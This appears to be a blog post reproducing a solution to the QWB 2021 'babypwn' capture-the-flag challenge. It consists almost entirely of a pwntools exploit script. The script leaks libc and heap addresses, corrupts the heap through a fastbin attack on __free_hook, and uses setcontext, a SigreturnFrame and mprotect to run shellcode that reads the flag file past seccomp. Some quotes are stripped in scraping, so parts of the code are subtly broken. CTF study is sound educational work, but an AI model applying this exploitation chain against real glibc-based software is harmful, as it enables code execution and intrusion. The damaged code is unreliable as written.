qwb2021 pwn复现

babypwn

exp

from pwn import *
from z3 import *
context.log_level=debug

p=process(["/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so","./babypwn"],env={LD_PRELOAD:/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so:./libseccomp.so.2})
#p=process(‘./babypwn‘)
def add(size):
  p.sendlineafter(>>> \n,1)
  p.sendlineafter(size:\n,str(size))

def edit(index,content):
  p.sendlineafter(>>> \n,3)
  p.sendlineafter(index:\n,str(index))
  p.sendlineafter(content:\n,content)

def free(index):
  p.sendlineafter(>>> \n,2)
  p.sendlineafter(index:\n,str(index))

def show(index):
  p.sendlineafter(>>> \n,4)
  p.sendlineafter(index:\n,str(index))
  
def solve(target):
  a1=BitVec(a1,32)
  x=a1
  for _ in range(2):
    x^= (32*x)^LShR((x^(32*x)),17)^(((32*x)^x^LShR((x^(32*x)),17))<<13)
  s=Solver()
  s.add(x==target)
  assert s.check()==sat
  return (s.model()[a1].as_long())

#leak libc_base
add(0x1f0)
add(0x200)
for i in range(2,9):
  add(0x1f0)
#pause()
for i in range(2,9):
  free(i)
free(0)


for i in range(7):
  add(0x1f0)
  print i
  #pause()
  if i!=5:
    edit(i,(p64(0)+p64(0x21))*0x18)

 
add(0xa0)
show(8)
libc=ELF(/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so)
tmp1=solve(int(0x+p.recvline(keepends=False),16))
tmp2=solve(int(0x+p.recvline(keepends=False),16))

addr=(tmp2<<32)+tmp1
print hex(addr)
base=addr-0x3ebe90
libc.address=base

#leak heap_base
add(0x140)
free(8)
free(9)
show(5)
tmp1=solve(int(0x+p.recvline(keepends=False),16))
tmp2=solve(int(0x+p.recvline(keepends=False),16))
addr=(tmp2<<32)+tmp1
print hex(addr)

heapbase=addr-0x12c0

gdb.attach(p)

add(0xa0)#8
add(0x148)#9
addr=heapbase+0xcb0
edit(9,a*0x148)
pause()
py=p64(addr)*2
py=py.ljust(0x140,a)+p64(0x150+0xa0)
edit(9,py)
edit(8,p64(0)+p64(0x1f0)+p64(addr)*2)
edit(1,a*0x1f0+p64(0)+p64(0x251))
pause()
add(0x1f0)
pause()
free(0)
for i in range(2,8):
  free(i)
pause()
free(1)#overlap

free_hook=libc.sym[__free_hook]
system=libc.sym[system]
setcontext=libc.sym[setcontext]+53
mprotect=libc.sym[mprotect]
pause()
add(0x120)#0
add(0x140)#1
pause()
free(1)
free(9)
pause()
edit(0,./flag\x00\x00+a*152+p64(free_hook))#fastbin_attack
pause()
add(0x140)#1
add(0x140)#2

pause()
context.arch=amd64
sig=SigreturnFrame()
sig.rsp=free_hook+0x10
sig.rbp=sig.rsp
sig.rip=mprotect
sig.rdi=free_hook&0xfffffffffffff000
sig.rsi=0x1000
sig.rdx=7
sig.csgsfs=0x2b000000000033
edit(0,str(sig))
pause()
shellcode=‘‘‘
mov rax,2
mov rdi,{sh}
mov rsi,0
syscall

xor rax,rax
mov rdi,3
mov rsi,{bss1}
mov rdx,0x300
syscall

mov rax,1
mov rdi,1
mov rsi,{bss2}
mov rdx,0x100
syscall
‘‘‘.format(sh=free_hook+0x78,bss1=free_hook-0x500,bss2=free_hook-0x500)
shellcode=asm(shellcode)
py=p64(setcontext)+flag\x00\x00\x00\x00+p64(free_hook+0x18)+shellcode
py+=py.ljust(0x100,\x90)
py+="flag\x00\x00\x00\x00"
edit(2,py)
pause()
free(0)
p.interactive()

 

qwb2021 pwn复现

上一篇:Git 的基本使用


下一篇:Nexus 的Docker 安装及配置说明